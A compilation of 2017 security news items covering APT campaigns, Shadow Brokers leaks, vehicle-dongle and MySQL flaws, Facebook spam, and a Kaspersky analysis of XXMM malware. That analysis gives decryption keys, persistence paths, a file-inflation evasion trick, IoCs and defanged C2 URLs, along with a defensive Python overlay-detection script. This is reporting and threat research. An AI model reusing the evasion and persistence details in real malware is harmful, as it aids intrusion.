The RIG exploit kit continues to dominate its threat segment and is expected to do so in the future as well, mainly because there are only a few active toolkits, meaning that there is little competition it has to face.

Numerous malicious spam campaigns observed in the first quarter abused password-protected Office documents, in an attempt to evade auto analysis sandboxes, Malwarebytes also notes. Recently, the Ursnif banking Trojan was observed using such documents in multiple campaigns worldwide.


Callisto APT Group exploited Hacking Team surveillance tools to hack Government targets
16.4.2017 securityaffairs APT

The Callisto APT Group borrowed the source code leaked by hackers that broke into Hacking Team network.
According to F-Secure Labs, the Callisto APT Group used the leaked HackingTeam surveillance software to gather intelligence on foreign and security policy in eastern Europe and the South Caucasus.

The Callisto APT group has targeted government officials, military personnel, journalists and think tanks since at least 2015.

F-Secure is still investigating the case; the company's experts reported that the Callisto Group's infrastructure has links with entities in China, Russia, and Ukraine.

The researchers speculate the attacker is a nation state actor:

“It is worth noting that during our investigation we uncovered links between infrastructure associated with the Callisto Group and infrastructure used to host online stores selling controlled substances.” reads the report published by F-Secure. “While the targeting would suggest that the main benefactor of the Callisto Group’s activity is a nation state with a specific interest in the Eastern Europe and South Caucasus regions, the link to infrastructure used for the sale of controlled substances hints at the involvement of a criminal element. Finally, the infrastructure associated with the Callisto Group and related infrastructure contain links to at least Russia, Ukraine, and China in both the content hosted on the infrastructure, and in WHOIS information associated with the infrastructure.”


The Callisto APT Group was involved in highly targeted phishing attacks using a malware that is a variant of the Scout tool from the RCS Galileo platform developed by the surveillance firm HackingTeam.

The code of the surveillance tool was leaked online after hackers broke into the Hacking Team network. F-Secure experts believe the Callisto Group did not use the leaked RCS Galileo source code; rather, the attackers used the leaked ready-made installers to set up their own installation of the RCS Galileo platform.

“The process for using the leaked installers to set up an RCS Galileo installation has been described online in publicly available blogposts, making the process trivial to achieve” continues the report. “In all known malicious attachments, the final payload was a variant of the “Scout” tool from the HackingTeam Remote Control System (RCS) Galileo hacking platform.”

According to the report, the Callisto APT continues to be active; the experts observed the most recent malware in February 2016, while the group continues setting up new phishing infrastructure on a weekly basis.

Let me suggest reading the report on the Callisto APT Group, which is full of interesting information, including IoCs and mitigation strategies.


Facebook dismantled a huge spam campaign leveraging bogus accounts
16.4.2017 securityaffairs Social

Facebook disrupted an international spam campaign leveraging bogus accounts used to create "likes" and bogus comments.
The security team at Facebook has disrupted an international spam operation after a six-month investigation. The company has neutralized a coordinated campaign that was leveraging bogus accounts used to create inauthentic likes and comments.

“Today we are taking another step to disrupt a spam operation that we have been combating for six months. It is made up of inauthentic likes and comments that appear to come from accounts located in Bangladesh, Indonesia, Saudi Arabia, and a number of other countries.” states a blog post published by Facebook.”We found that most of this activity was generated not through traditional mass account creation methods, but by more sophisticated means that try to mask the fact that the accounts are part of the same coordinated operation.”

The intent of the campaign was to deceptively grow the operators' social network by adding new friend connections, liking and interacting primarily with popular publisher Pages on Facebook. The attackers then used their network of connections to send out spam messages. A huge number of bogus accounts became dormant after liking a number of Pages, "suggesting they had not been mobilized yet to actually make connections and send spam to those people."

Systems at Facebook were able to identify the fraudulent activity and to remove a significant volume of inauthentic likes, even though the attackers used tricks to avoid detection, such as redirecting traffic through "proxies" that disguised their location.

“By disrupting the campaign now, we expect that we will prevent this network of spammers from reaching its end goal of sending inauthentic material to large numbers of people.” continues Facebook.


As a result of Facebook's action, the company's experts expect that 99% of impacted Pages with more than 10,000 likes will see a drop of less than 3%.

Facebook confirmed security improvements to its systems to prevent abuse of its platform; social networks are today privileged attack vectors for crooks.

“We’ve found that when people represent themselves on Facebook the same way they do in real life, they act responsibly,” said Shabnam Shaik, a company security manager.

“Fake accounts don’t follow this pattern, and are closely related to the creation and spread of spam.”


Flaws in the Bosch Drivelog Connector dongle could allow hackers to halt the engine
16.4.2017 securityaffairs Vulnerability

Security experts discovered vulnerabilities in the Bosch Drivelog Connector dongle that could be exploited by hackers to stop the engine.
Security researchers at automotive cybersecurity firm Argus discovered vulnerabilities in the Bosch Drivelog Connect solution that can be exploited by hackers to inject malicious messages into a vehicle's CAN bus.

The Bosch Drivelog Connect is the system that provides information about the state of a vehicle, it includes the Drivelog Connector dongle.


The Drivelog Connector dongle is connected to the OBD2 diagnostics interface of the vehicle, and a mobile application communicates with it via Bluetooth.

The researchers analyzed the protocol of communication between the mobile app and the dongle and identified two potentially serious vulnerabilities.

“The vulnerabilities allowed us to stop the engine of a moving vehicle using the Drivelog platform. On February 20th, 2017, in accordance with Argus’ responsible disclosure policy, upon uncovering the vulnerabilities we informed Bosch of our findings. On February 21st, 2017, Bosch’s Product Security Incident Response Team (PSIRT) contacted Argus and began addressing the issue.” reads the analysis published by Argus.

"In summary, the following two vulnerabilities were found:
– An information leak in the authentication process between the Drivelog Connector Dongle and the Drivelog Connect smartphone application.
– Security holes in the message filter in the Drivelog Connector dongle."

One of the vulnerabilities affects the authentication process between the Drivelog Connector and the Drivelog Connect mobile app. The experts analyzed the Android version of the mobile app.

The second flaw resides in the message filter in the Drivelog Connector dongle.

According to researchers, diagnostic messages can only be sent to the CAN bus using a valid service ID, but the attacker can use OEM-specific messages that pass the filter in order to have a physical effect on the car.

An attacker with root privileges on the driver’s mobile phone can leverage this message filter bypass to send malicious CAN messages outside the scope of the small subset of diagnostic messages (i.e., OBDII PIDs).

According to Argus, during the tests, its researchers managed to remotely stop the engine of a moving car by triggering the vulnerability.

Car vendors point out that this kind of attack is very hard to prevent because the attacker has already taken over the legitimate driver’s smartphone.

The Argus researchers went further and devised a method to launch the attack without compromising the driver’s smartphone.

The experts discovered an information disclosure vulnerability in the authentication process between the app and the dongle that could be exploited by an attacker to connect to a targeted device without compromising the phone first.

Analyzing the authentication process, the researchers discovered that the dongle sends any connecting Android device several pieces of information that can be used to recover the user-supplied authorization PIN.

This data is enough to guess the PIN offline through a brute-force attack, limited only by the number of possible PINs.

“Since, a Drivelog Dongle’s PIN has eight digits, there are 100 million possible PINs. A single verification requires a SHA256 calculation and a public key encryption operation. The calculations can be trivially parallelized – but the reality is, there’s no need: a modern laptop can run 100 million SHA256 computations and encryptions in roughly 30 minutes (according to independent benchmarks for the Ed25519 public-key signature system) using properly optimized software.” reads the analysis. “The time needed can be further reduced by running several brute-forcing servers in parallel.”

Once the connection has been established, the attacker can send malicious CAN bus messages from their own device instead of having to compromise the driver’s smartphone; the only limitation is that the attacker needs to be within Bluetooth range of the targeted vehicle.

Bosch fixed the issues by introducing two-step verification in the authentication process.

“The improper authentication vulnerability in the Bluetooth communication has been mitigated by activating a two-step verification for additional users to be registered to a device. This has been implemented on the server, so no action is required by the user. To further increase security in the authentication process an application and dongle firmware update will also be released.” states the advisory published by Bosch.

The company also plans to release a firmware update for the Drivelog Connector dongle to prevent this kind of attack.


The security is still secure

16.4.2017 Kaspersky Safety
The WikiLeaks report and Kaspersky Lab's products

Recently WikiLeaks published a report that, among other things, claims to disclose tools and tactics employed by a state-sponsored organization to break into users’ computers and circumvent installed security solutions.

The list of compromised security products includes dozens of vendors and relates to the whole cybersecurity industry. The published report includes a description of vulnerabilities in software products that can be used to bypass protection and jeopardize users’ security.

Customers’ security is a top priority for Kaspersky Lab, and as such we take any information that could undermine users’ protection very seriously. We thoroughly investigate all reported vulnerabilities.

The published report contains descriptions of two vulnerabilities in Kaspersky Lab’s products that have already been fixed. It also includes a number of mentions related to the company’s technologies and past Advanced Persistent Threat (APT) research. I’d like to take this opportunity to address possible concerns regarding the report and provide reliable first-hand information to demonstrate that no current Kaspersky Lab products and technologies are vulnerable.

Vulnerabilities in security solutions

First of all, I’d like to emphasize that the vulnerabilities in Kaspersky Lab’s products listed in the report are related to older versions of the products, and they were publicly disclosed and fixed some time ago. The current versions of our products are not vulnerable to the tools and tactics listed.

The “heapgrd” DLL inject vulnerability was discovered and fixed in Kaspersky Lab products back in 2009. The vulnerability allowed a malefactor to load a third-party DLL instead of the WHEAPGRD.dll file and thus bypass protection. It was patched starting with Kaspersky Internet Security 9 and Kaspersky Antivirus for Workstations MP4. The products that were mentioned in relation to these vulnerabilities (Kaspersky Internet Security 7 and 8 and Kaspersky Antivirus for Workstations MP3) are outdated and no longer supported. All current Kaspersky Lab solutions are subject to mandatory testing against these vulnerabilities prior to release.

The TDSS Killer’s DLL inject vulnerability mentioned in the WikiLeaks report was fixed in 2015.

Product behavior specifics

The report also says Kaspersky Lab’s security solutions do not block DLL injections into user processes and svchost.exe. In fact, we do protect against this sort of attack — in a smarter way that elegantly combines protection and a better user experience.

Nowadays, it’s common practice for legitimate applications to inject their code into user processes. To effectively distinguish legitimate from malicious actions, track changes, and restore unwanted amendments an application may make to the system, Kaspersky Lab’s products have included the System Watcher component since 2011. System Watcher monitors all processes on a device, including svchost.exe, and is capable of detecting malicious behavior, blocking it, and rolling back malicious changes.

The report also describes several tools and malicious programs that were used to collect data and infiltrate the users’ computers. However, all of them can be neutralized with Kaspersky Lab’s products. Let’s take a closer look at them.

First, the RickyBobby fileless Trojan is allegedly not detected by Kaspersky Lab’s products, which is not the case. All personal and enterprise level products can detect this Trojan, prevent the infection, and disinfect a system that was protected by a third-party or outdated security solution.

Second, the report mentions two other malware samples (Fine Dining and Grasshopper) that allegedly are not detected by Kaspersky Lab’s products. However, the report doesn’t provide further details of the malware. We will keep investigating the issue and report the findings as soon as details are available.

That said, we are skeptical: It’s said Fine Dining relies on the aforementioned DLL inject vulnerability in TDSS Killer, which is already fixed. Also it’s worth mentioning that Kaspersky products provide multiple layers of protection — such as emulation, heuristics, System Watcher, and Automatic Exploit Prevention — including those powered by industry-leading machine learning. These technologies are capable of detecting cyberthreats proactively based on their behavior and are constantly improved to address new techniques employed by malicious actors. The analysis of the report makes us optimistic that our customers are already protected against both Fine Dining and Grasshopper.

Third, the report mentions HammerDrill, API Memcry, and Trojan Upclicker, which use a variety of techniques to try to avoid detection by the emulator technology.

Kaspersky Lab’s emulator’s history dates back to the early 90s. It’s rated one of the best in the cybersecurity industry, and it’s continuously improved. The functionality to address the described Trojan Upclicker cloaking method was included in the emulator more than a year ago, for example. The other two tools are effectively managed by the multilayer protection available in Kaspersky Lab’s products both for home users and enterprise customers.

Fourth, the report mentions an MBR File Handle component that is able to circumvent security solutions’ drivers and thus upload malware into the Master Boot Record of the operating system.

In fact, this trick is foiled by the antirootkit technology included in Kaspersky Lab products, which enables them to reliably detect and remove infections — even the most advanced bootkits.

Fifth, another tool mentioned in the report is the Bartender program, which collects data on installed software. This functionality is not malicious and is used by many legitimate applications. However, Kaspersky Lab’s products do provide protection against such activity should a user select the high security level setting.

Fun facts

The other two mentions of Kaspersky Lab in the context of malware creation are actually fun facts.

First, the tool called DriftingShadows checks if Kaspersky Lab’s products are installed on the device, and if it finds them, it does … nothing. This means that the malware creators failed to sneak past our products. They now avoid protected devices so that their malware doesn’t get caught.

Second, the documents also describe a game called “Bonus: Capture the Flag” played among malware creators. It involves attempts to create a malware sample that bypasses Kaspersky Lab’s protection. In other words, malefactors consider our products a gold standard of cybersecurity.

Wrap-up

Investigating the existing report thoroughly, we found two vulnerabilities and several other mentions of Kaspersky Lab, including discussions regarding our reports on the Duqu 2.0 and Equation cyberespionage campaigns. Both vulnerabilities were fixed quite some time ago and pose no threat to our customers. The same goes for the other malicious tools and techniques mentioned.

However, we are staying vigilant and continuously monitoring the situation. WikiLeaks may yet publish more details. In any case, we’d like to reassure customers that addressing any possible vulnerabilities will be our top priority.

No development process guarantees immediate, perfect, permanent invincibility. We are committed to constantly improving the development process, and we also make significant efforts to perfect the process of fixing newly discovered vulnerabilities.


Old Malware Tricks To Bypass Detection in the Age of Big Data
16.4.2017 Kaspersky Virus

Kaspersky Lab has been tracking a targeted attack actor’s activities in Japan and South Korea recently. This attacker has been using the XXMM malware toolkit, which was named after an original project path revealed through a pdb string inside the file: “C:\Users\123\documents\visual studio 2010\Projects\xxmm2\Release\test2.pdb”. We came across an unusual technique used by a sample which contained no pdb strings but was very similar to a variant of XXMM malware in terms of code similarity, malware functionality, crypto-algorithm, data structures and module configuration.

The malware sample we observed was named “srvhost.exe” to resemble a standard system process name. It came from one of our partners at the beginning of 2017. One of the most surprising features of the malware was its file size, which is not commonly seen in malware – it was over 100MB. According to our analysis, this malware is a Trojan loader component that activates a backdoor. We could not confirm pdb strings from this malware, however the backdoor module seems to be named “wali” by the author, according to strings from the embedded config block.

Fig. config strings with “[wali]” section

Fig. “wali.exe” name in the malware body

The wali loader decrypts the embedded wali backdoor with a simple XOR operation using the byte “\x63” as the key; “\x63” is not the only key, as we confirmed other values. The loader then injects the wali backdoor module into the memory of the iexplore.exe process.

What is inside the wali loader that makes it so big? The reason is that this sample carries a very large overlay of junk data. We found more than 20 other similar samples (wali loader + overlay) using open source intelligence and by searching our malware collection with a YARA rule. After removing the overlay, there were only six unique samples.

md5_payload                       md5_payload+overlay               size
d1e24c3cc0322b22988a1ce366d702e5  8bd0ddeb11518f3eaaddc6fd82627f33  105982049
e4811950899f44f9d14a786b4c5b1faa  2871ec229804a6e872db55dafa5c9713  105997178
                                  3e24710d7ade27316d367dd8cb2a0b1a  105996860
                                  3e9feea893482b65a68b1feecb71cd4d  105997043
                                  558ca7fa8ed632fa4f8c69e32888af0f  105997191
                                  d11f7b25823ce474e30e8ab9c8d567b0  105996847
                                  f4c3f06faf53ad2bbc047818344a2323  105997181
                                  f7cc6a5a06cd032c6172d14c1568b976  105997102
e7492f11c88d32e1e0b43f6b29604ec8  6a5558e4ab530f9b5c2d5bcc023d3218  105997658
                                  bb8cef31cf6211c584d245be88573e1f  105997755

Table. Some samples of 100M+ bytes wali loader + overlay
The overlay data is generated by the wali dropper when the wali loader is installed onto the victim’s machine. The following figure shows the structure of malware components and how they are related to each other:

Fig. Structure of wali modules

Wali dropper1 checks the CPU architecture. If the CPU is 64-bit, the malware decrypts the 64-bit version of the wali loader from resource id 101; otherwise, it decrypts the 32-bit version of the wali loader from resource id 102. To extract the resource data it uses RC4 with “12345” as the key, and then LZNT1 to decompress the data. Dropper1 creates a file named “win${random4 chr}.tmp.bat” in the current temp directory from the decrypted wali dropper2 data. Finally, it appends generated garbage data to the overlay of the dropped file and runs wali dropper2.

Wali dropper2 checks whether the user account has admin privileges, decrypts the wali loader using the same algorithm and key as dropper1, and creates new files at the following paths:

%ProgramFiles%\Common Files\System\Ole DB\srvhost.exe
%appdata%\Microsoft\Windows\Start Menu\Programs\srvhost.exe
It also appends generated garbage data to the overlay using the same function. Finally, it creates a registry value named “sunUpdate” under “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run” to ensure persistence.

Generation of Junk Data

Appending junk data to the malware executable to inflate the file size is quite unique to wali dropper1 and wali dropper2. We assume that by creating a large file the authors wanted to avoid AV detection, complicate sample exchange and stay below the radar of the most commonly used YARA rules. The function that generates the junk data is shown below:

Fig. Function to create junk data (create_garbage_data).

The create_garbage_data function generates random bytes in a loop of 1,000 iterations. In every iteration it fills blocks of data of random length within certain dynamically calculated limits. The result of create_garbage_data is then written to the overlay of the decrypted wali loader, and the process is repeated 100 times. This produces roughly 100MB of junk data appended to the executable.

Fig. Loop to append the junk data to overlay.

The size of one wali loader (MD5: d1e24c3cc0322b22988a1ce366d702e5) was initially 1,124,352 bytes. The function that appends garbage produced a new malware file in a real attack (MD5: 8bd0ddeb11518f3eaaddc6fd82627f33) and the file size was increased to 105,982,049 bytes.

As the appended junk data is created dynamically and depends on random values, the size of it may vary. We have seen 100MB files as well as 50MB samples used in real world attacks. The largest we observed was a 200MB malware sample created with the same trick. This technique currently doesn’t affect detection of the malware by Kaspersky Lab products. The malware is detected as:

Trojan.Win32.Xxmm
Trojan.Win64.Xxmm
Trojan-Downloader.Win32.Xxmm
Trojan-Downloader.Win64.Xxmm
Trojan-Dropper.Win32.Xxmm
Trojan-Dropper.Win64.Xxmm
Inflating file size with garbage data is not a completely new technique. Previously, polymorphic viruses and worms used it a lot to mix original code with garbage data spread across the malware file, sometimes increasing the file size by hundreds of kilobytes or even megabytes. Certain software protectors may also insert decoy files into packed files and inflate the file size up to 1MB. We have also seen executable malware disguised as movie files and ISO files spread over torrents; in those cases the malware size is inflated to a few gigabytes in order to mimic the real content.

What is quite unique about this use of appended junk data is that here the technique is employed in targeted attacks, after the initial infection, during the later phases of the attack, with the intention of increasing file size to avoid detection.

While this technique may seem inefficient as a primitive approach to bypassing detection, we believe that in certain cases this malware may stay below the radar of incident responders and forensic analysts who use YARA rules to scan hard drives. The reason is that a common practice among YARA rule authors is to limit the size of scanned files, mainly to improve scanning performance. Large files, like the ones produced by the XXMM malware, may become invisible to such rules, which is why we recommend that security researchers consider this when creating rules for dropped malware.
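One way to make a scan robust against this trick is to key the check on the PE section table rather than on file size: everything past the end of the last section is overlay, and an overlay that dwarfs the mapped image is itself a signal, however large the file. The script below is an added example written for this page, not code from Kaspersky or from the XXMM analysis. It parses just enough of a PE header to measure the overlay, contrasts that with a size-capped string check of the kind the text warns about, and builds its own tiny constructed PE images (with a fake 12 MB overlay) so it runs offline; the thresholds (10 MB, 5x the image size) and the “wali.exe” marker string are assumptions chosen for illustration.

```python
import os
import struct
from typing import NamedTuple


class OverlayInfo(NamedTuple):
    image_end: int     # highest file offset covered by any section's raw data
    file_size: int
    overlay_size: int  # bytes appended after the last section


def pe_overlay(data: bytes) -> OverlayInfo:
    """Measure the overlay of a PE file from its section table.

    Legitimate binaries usually carry little or no overlay; the XXMM
    loader carries ~100 MB of random bytes there, whatever the file size.
    """
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not a PE file (missing MZ header)")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file (missing PE signature)")
    coff = e_lfanew + 4
    n_sections = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    sect = coff + 20 + opt_size
    image_end = sect + 40 * n_sections  # at least the headers themselves
    for i in range(n_sections):
        # SizeOfRawData and PointerToRawData sit at offsets 16 and 20
        raw_size, raw_ptr = struct.unpack_from("<II", data, sect + 40 * i + 16)
        image_end = max(image_end, raw_ptr + raw_size)
    return OverlayInfo(image_end, len(data), max(0, len(data) - image_end))


def is_inflated(data: bytes, min_overlay: int = 10 * 1024 * 1024,
                ratio: float = 5.0) -> bool:
    """Flag a file whose overlay is large in absolute terms and much larger
    than the mapped image (assumed thresholds, the XXMM pattern)."""
    info = pe_overlay(data)
    return info.overlay_size >= min_overlay and info.overlay_size >= ratio * info.image_end


def size_capped_rule_matches(data: bytes, max_filesize: int = 10 * 1024 * 1024) -> bool:
    """Mimic a YARA rule written with the common 'filesize < 10MB' guard:
    the string condition is never evaluated for bigger files."""
    if len(data) >= max_filesize:
        return False
    return b"wali.exe" in data  # marker string assumed for illustration


def build_synthetic_pe(section_bytes: bytes, overlay_bytes: bytes) -> bytes:
    """Constructed stand-in for a PE file: DOS header, PE signature, COFF
    header, a zeroed PE32 optional header and one .text section, then overlay."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    opt_size = 0xE0  # size of a PE32 optional header
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, opt_size, 0x102)
    headers_len = e_lfanew + 4 + 20 + opt_size + 40
    raw_ptr = (headers_len + 0x1FF) & ~0x1FF  # 512-byte file alignment
    section = (b".text\0\0\0"
               + struct.pack("<IIII", len(section_bytes), 0x1000, len(section_bytes), raw_ptr)
               + struct.pack("<IIHHI", 0, 0, 0, 0, 0x60000020))
    head = dos + b"PE\0\0" + coff + b"\0" * opt_size + section
    head += b"\0" * (raw_ptr - len(head))
    return head + section_bytes + overlay_bytes


def demo() -> dict:
    """Compare both checks on a clean sample and an XXMM-style inflated one
    (both constructed here, not real samples)."""
    clean = build_synthetic_pe(b"\xcc" * 4096, b"")
    inflated = build_synthetic_pe(b"\xcc" * 4096 + b"wali.exe", os.urandom(12 * 1024 * 1024))
    return {
        "clean_overlay": pe_overlay(clean).overlay_size,
        "inflated_overlay": pe_overlay(inflated).overlay_size,
        "clean_flagged": is_inflated(clean),
        "inflated_flagged": is_inflated(inflated),
        "size_capped_rule_hits_inflated": size_capped_rule_matches(inflated),
    }


if __name__ == "__main__":
    print(demo())
```

The size-capped string rule never sees the inflated sample, while the overlay ratio flags it and ignores the clean one; in a real YARA rule the equivalent is to drop the `filesize` guard for dropped executables, or to compare `filesize` against the end of the section table instead of a fixed constant.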

Indicators of Compromise

SHA256sum of samples

Wali dropper1:

9b5874a19bf112832d8e7fd1a57a2dda180ed50aa4f61126aa1b7b692e6a6665
Wali dropper2:

da05667cd1d55fa166ae7bd95335bd080fba7b53c62b0fff248ce25c59ede54a
10fca84ae22351356ead529944f85ef5d68de38024d4c5f6058468eb399cbc30
Wali loader + overlay:
Wali loader:

a24759369d794f1e2414749c5c11ca9099a094637b6d0b7dbde557b2357c9fcd
b55b40c537ca859590433cbe62ade84276f3f90a037d408d5ec54e8a63c4ab31
c48a2077e7d0b447abddebe5e9f7ae9f715d190603f6c35683fff31972cf04a8
725dedcd1653f0d11f502fe8fdf93d712682f77b2a0abe1962928c5333e58cae
cfcbe396dc19cb9477d840e8ad4de511ddadda267e039648693e7173b20286b1
C2 (compromised web sites) of wali:

hXXp://******essel[.]com/mt/php/tmpl/missing.php
hXXp://******essel[.]com/mt/mt-static/images/comment/s.php
hXXp://******hi[.]com/da******/hinshu/ki******/ki******.php
hXXp://******an[.]jp/_module/menu/menug/index.php
hXXp://******etop.co[.]jp/includes/firebug/index.php
hXXp://******etop.co[.]jp/phpmyadmin/themes/pmahomme/sprites.html
hXXp://******usai[.]com/ex-engine/modules/comment/queries/deleteComment.php
hXXp://******1cs[.]net/zy/images/patterns/preview/deleteComments.php
hXXp://******1cs[.]net/zy/images/colorpicker/s.php
Filename (over 50MB size):

srvhost.exe
propsyse.exe
perfcore.exe
oldb32.exe
oledb32.exe
javaup.exe


Turns Out Microsoft Has Already Patched Exploits Leaked By Shadow Brokers

15.4.2017 thehackernews Vulnerebility


The latest dump of hacking tools allegedly belonging to the NSA is believed to be the most damaging release by the Shadow Brokers to date.
But after analyzing the disclosed exploits, Microsoft's security team says most of the Windows vulnerabilities exploited by these hacking tools, including EternalBlue, EternalChampion, EternalSynergy, EternalRomance and others, were already patched in last month's Patch Tuesday update.
"Most of the exploits that were disclosed fall into vulnerabilities that are already patched in our supported products. Customers still running prior versions of these products are encouraged to upgrade to a supported offering," Microsoft Security Team said in a blog post published today.
On Good Friday, the Shadow Brokers released a massive trove of Windows hacking tools allegedly stolen from the NSA that work against almost all versions of Windows, from Windows 2000 and XP to Windows 7 and 8, and their server-side variants such as Server 2000, 2003, 2008, 2008 R2 and 2012, except Windows 10 and Windows Server 2016.
The hacking exploits could give nearly anyone with technical knowledge the ability to break into millions of Windows computers and servers all over the Internet, at least those that are not up to date.
"Of the three remaining exploits, “EnglishmanDentist”, “EsteemAudit”, and “ExplodingCan”, none reproduces on supported platforms, which means that customers running Windows 7 and more recent versions of Windows or Exchange 2010 and newer versions of Exchange are not at risk." Microsoft says.
The data dump also includes some top-secret presentations and excel sheets, indicating that the leaked exploits may have been used to hack the SWIFT banking system of several banks across the world.
A hacking tool called Eternalromance contains an easy-to-use interface and exploits Windows systems over TCP ports 445 and 139.

The most noteworthy exploit in the Friday's dump is Eternalblue — an SMBv1 (Server Message Block 1.0) exploit that could cause older versions of Windows to execute code remotely.
Matthew Hickey, a security expert and co-founder of Hacker House, also published a video demonstration in which he used this exploit, together with another alleged zero-day tool called FuzzBunch, against a virtual machine running Windows Server 2008 R2 SP1 and pulled off the hack in less than 2 minutes.


But if the company already patched this flaw last month, how could this exploit work against an updated machine? It seems the researcher tried this exploit against a Windows machine without the latest updates installed.
"The patches were released in last month's update, I tested on a fully patched Windows 2008 R2 SP1 (x64), so many hosts will be vulnerable - if you apply MS17-010 it should protect hosts against the attacks," Matthew clarifies during a conversation with The Hacker News.
No Acknowledgement for SMB RCE Issue by Microsoft
There's also news floating around the Internet that the "NSA has had, at a minimum, 96 days of warning," knowing that the Shadow Brokers could drop the files at any time, but the agency did not report the flaws to Microsoft.
The Intercept also reported that Microsoft told it that the company had not been contacted by any "individual or organization," in relation to the hacking tools and exploits released by the Shadow Brokers.
The vulnerabilities have already been patched by Microsoft, which acknowledges all security researchers who report issues in its products, but, interestingly, there are no acknowledgments for MS17-010, which patched most of the critical flaws from the Shadow Brokers dump.
This indicates that someone from the agency, or linked to a defense contractor, might have warned the company about the SMB RCE issue.
So, only those who are still using Windows XP, which Microsoft has not supported for a long time, are at risk of getting their machines hacked.
And there is no need to panic if you use an updated Windows 7, 8 or 10 (or even Windows Vista, whose support ended just last week; the issue was patched last month).
The simple advice for you is to always keep your Windows machines and servers up-to-date in order to prevent yourself from being hacked.


Watch out, the Riddle vulnerability affects some Oracle MySQL versions. Update them now
15.4.2017 securityaffairs Vulnerebility

A bug dubbed Riddle vulnerability affecting MySQL 5.5 and 5.6 clients exposed user credentials to MiTM attacks. Update to version 5.7.
A coding error dubbed The Riddle has been uncovered in the popular Oracle MySQL DBMS; the issue can potentially be exploited by an attacker performing a man-in-the-middle attack to steal usernames and passwords.
“The Riddle is a critical security vulnerability found in Oracle’s MySQL 5.5 and 5.6 client database libraries. The vulnerability allows an attacker to use riddle in the middle for breaking SSL configured connection between MySQL client and server.” states the description of the flaw. “This vulnerability is a very critical security hole because it affects MySQL — a very popular SQL database — and SSL connection which is by its definition secure.”
The flaw, tracked as CVE-2017-3305, potentially exposes login credentials to eavesdropping: an attacker can capture them when MySQL 5.5 and 5.6 clients send them to servers.
A security update released for versions 5.5.49 and 5.6.30 failed to completely fix the bug. The experts noted that versions 5.7 and later, as well as MariaDB systems, are not affected by this issue.
According to security researcher Pali Rohár, the Riddle vulnerability results from the failed attempt to patch the BACKRONYM vulnerability affecting the MySQL database. The Backronym vulnerability exposes passwords to attackers who are in a position to run a man-in-the-middle attack, even if the traffic is encrypted.
“Security update for the stable MySQL 5.5.49 and 5.6.30 versions consisted of adding a verification of security parameters after the authentication process was finished.” “Since it is done after the authentication, riddle in the middle attack together with SSL-downgrade attack can be used by the attacker to steal login data for immediate authentication and log into the MySQL server,” wrote Rohár.

Riddle vulnerability

“Ridiculous part is that MySQL client doesn’t report any SSL-related error when MySQL server declines to authenticate a user and instead reports unencrypted error message send by the server. Furthermore, the error message is controlled by the attacker, when the riddle in the middle attack is active.”

The expert suggests updating the client software to MySQL 5.7 or MariaDB, because the security updates for these applications correctly work.

The Riddle vulnerability was discovered in February, but today the bug still affects the Oracle MySQL software.

“Reporting bugs to Oracle is useless (even those which are security related) if you are not an Oracle customer. They can perfectly ignore any reports and they would be very happy if nobody knew about it so they don’t have to fix the bugs,” explains Rohár.

“It looks like immediate public disclosure is the best responsible solution for the users, as it is the only way to protect them and let them know immediately what should be done if they are affected.”


Facebook Disrupts Suspected Spam Operation

15.4.2017 securityweek Social
Facebook on Friday said it disrupted an international fake account operation that was firing off inauthentic "likes" and bogus comments to win friends it would then pound with spam.

Facebook's security team spent six months fighting to neutralize what they saw as a coordinated campaign, according to Shabnam Shaik, a company security manager.

"Our systems were able to identify a large portion of this illegitimate activity -- and to remove a substantial number of inauthentic likes," Shaik said in a blog post.

"By disrupting the campaign now, we expect that we will prevent this network of spammers from reaching its end goal of sending inauthentic material to large numbers of people."

The ring used accounts in a number of countries including Bangladesh, Indonesia and Saudi Arabia.

The group tried to mask its activities with tactics like connecting with the social network through "proxy" servers to disguise where "likes," posts or other communications were originating, according to Shaik.

Facebook said the campaign aimed to trick people into connecting as friends they would later target with spam. The company said it had derailed the operation early enough to spare users that fate.

The leading social network this week said it has started weeding out bogus accounts by watching for suspicious behavior such as repetitive posts or torrents of messages.

The security improvement was described as being part of a broader effort to rid the leading social network of hoaxes, misinformation and fake news by verifying people's identities.

"We've found that when people represent themselves on Facebook the same way they do in real life, they act responsibly," Shaik said.

"Fake accounts don't follow this pattern, and are closely related to the creation and spread of spam."

Under pressure to stymie the spread of fake news, Facebook has taken a series of steps including making it easier to report such posts and harder to earn money from them.


Veteran Industrial Cybersecurity Firm PAS Raises $40 Million

15.4.2017 securityweek Cyber 
With deep roots in software solutions for process safety and asset reliability for industrial firms, Houston, TX-based PAS announced this week that it has taken a $40 Million investment that will be used to fuel its Industrial control system (ICS) cybersecurity business.

While many new startups have emerged in the industrial cybersecurity space in recent years, PAS has been around for 23 years and says its solutions are deployed in more than 1,100 facilities globally in more than 70 countries.

Previously known as Plant Automation Services, Inc. (“PAS”), the company has reorganized under the new corporate name PAS Global, and will use the investment to expand its security solutions portfolio and support global growth.

Founded by Eddie Habibi, who currently serves as CEO, the company has not taken any outside funding before.

“PAS has a 23-year tradition of making industrial process facilities safer and more reliable,” Habibi said in a statement. “Our deep expertise in control systems and production-centric approach to securing ICS give us a formidable competitive advantage.”

The company helps customers comply with regulatory standards including NERC CIP, NIST, and IEC 62443, with offerings including ICS cybersecurity, automation asset management, IPL assurance, alarm management, high performance HMI, boundary management, and control loop performance optimization.

“This funding round will expand PAS sales and marketing across its global offices as well as increase research and development for Cyber Integrity, its flagship cybersecurity software product,” the company said. “Cyber Integrity protects critical infrastructure from risks associated with rising industrial internet of things (IoT) adoption, malicious cyber attacks, and insider threats.”

The $40 million growth investment came from investment firm Tinicum, a private investment partnership focused on late stage investments in manufacturing, energy, technology, media, and infrastructure.


Shadows Brokers released another archive that suggests NSA compromised a SWIFT system
15.4.2017 securityaffairs BigBrothers

The Shadow Brokers group released a 117.9 MB encrypted dump containing documents that suggest the NSA hacked a SWIFT system in the Middle East.
Last week, the notorious Shadow Brokers hacker group that claimed to have stolen hacking tools and exploits from the NSA leaked the password for an encrypted cache of Unix hacking tools and exploits, including a remote root zero-day exploit for Solaris OS and the TOAST framework.
